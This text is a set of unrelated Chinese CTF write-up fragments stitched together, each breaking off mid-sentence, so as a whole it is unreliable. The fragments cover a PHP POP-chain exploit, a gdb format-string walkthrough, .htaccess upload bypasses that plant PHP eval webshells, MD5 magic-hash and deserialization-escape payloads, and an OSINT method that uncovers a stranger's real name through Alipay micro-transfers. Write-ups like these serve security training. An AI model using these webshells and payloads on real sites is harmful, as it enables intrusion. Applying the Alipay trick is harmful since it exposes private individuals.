W@v3s战队 一、战队信息 名称:W@v3s 排名:9 二、解题情况 粘贴解题图片 三、解题过程 Web 题目一名称 Checkin 直接访问 Burp抓包即可得到flag 关键步骤截图 题目二名称 pppop Pop链的exp: <?php class A1{ public $tmp1; public $tmp2; } class A3{ } class A4{ public $tmp1; } class A6{ public $tmp1; } class A8{ } $a1 = new A1(); $a3 = new A3(); $a4 = new A4(); $a6 = new A6(); $a8 = new A8(); $a1->tmp1=$a3; $a3->tmp2=$a4; $a4->tmp1=$a6; $a6->tmp1=$a8; echo urlencode(serialize($a1)); 这时候会执行echo new $this->tmp1($this->tmp2); 使用Glo
格式化字符串的一道题,整了一整天才弄明白,问了我哦等我哈了大佬和口那是二进制神。来复现一下 这个题目是这样的,看起来是不是很简单,确实,我刚开始学,啥也不是。 第一关 先康康前面七句 :Coolapk84: 这个属于是第一关了,格式化字符串改数值。要利用11行这个把v3改成12。 那么咋改呢,利用格式化字符串漏洞,由于这个题目限制输入比较严格,需要打开gdb来调试,看格式化字符串的偏移。 据二进制神称,我们需要用gdb把点断在call scanf后面一行,这里可以用disassemble vuln来看汇编: 可以看到 0x08048625 <+79>: call 0x8048490 <__isoc99_scanf@plt> 0x0804862a <+84>: add esp,0x10 复制2a这个地址,然后b *0x0804862a就可以断在这里了。然后r一下,随便输点什么让他读进去,回车,就断在这里了 然后输入stack 30 看看栈上,你刚刚输入的东西在什么位置 这里可以看到是在第0f个,所以偏移就是0
第一次参加的校赛 :Coolapk46: 要被锤爆了 好多大佬噢,还有个没进集训队的巨佬直接冲到第三,tql 这里是官方题目和wp https://github.com/A1natas/zjnuctf-school-contest-2021 下面是菜鸡wp请慢用 热身 网络安全法 直接搜网络安全法颁布日期 web web签到 Hackbar post system(“cat flag;”)即可 easy upload 上传.htaccess文件,内容为 <FilesMatch "evil.png"> SetHandler application/x-httpd-php </FilesMatch> burp抓包改文件类型为image/jpeg 然后上传 evil.png,内容为<?php eval($_POST[pass]);?> 蚁剑连接,密码为pass,根目录找到flag md5 Payload:?a1=QNKCDZO&a2=s878926199a&b1[]=111&b2[]=222 Post:cmd=system('c
MISC png 下载图片发现是一张可爱猫咪图片,直接放到010editor里面,发现图片尾部有一段 base64M2I3OWJkZjhmY2ZkNTVmZH0=,拿去解码得到3b79bdf8fcfd55fd},后面好像没有什么东西了,然后尝试crc隐写。放入脚本解码得到原本的宽高为04 29修改后得到flag第一部分 不说人话 进去一看只有.!?三个字符,直接想到是Ook密码变形,然后打开记事本替换后解码即可 https://www.splitbrain.org/services/ook 【真签到题】快来看直播 进入直播间后flag就在上面 【The End】世界的终焉 明明是问卷,名字还这么高级 溯源!溯源!溯源! 这题真是。。一言难尽 多试了几次 第一题可以通过这个whois查询到邮箱https://www.whois365.com/cn/ 第二题查姓名第一个字是通过支付宝转账0.01之后可以直接通过银行app查看被转账人姓名 第三题姓名最后一个字直接进入支付宝转账界面看最后一个字 第四题百度电话号码,可以查到一个表单,里面包含南京雨花九如啥啥啥的养老院负责人电话,看了一下
比赛:UNCTF2020校内赛 ID:Satan9a xuxuan AN_666 Xunflash Web 1.easy_ssrf 2.俄罗斯方块人大战奥特曼 查看源代码,发现有一个压缩包 下载下来 发现有 打开即可得到flag 3.easy_upload 解题过程: 上传题,测试不能上传php,phtml等,发现数据库是apache,尝试上传.htaccess文件,文件内容 plain AddType application/x-httpd-p\ hp .jpg 上传hp.jpg 内容 plain <?=eval($_POST[satan]); 连接蚁剑得到flag 4.easyunserialize 解题过程: 反序列化字符串逃逸,构造payload plain challengechallengechallengechallengechallengechallengechallengechallenge";s:8:"password";s:4:"easy"};;; 得出flag 5.ezphp 解题过程: 原题,构造payload plain data=a:2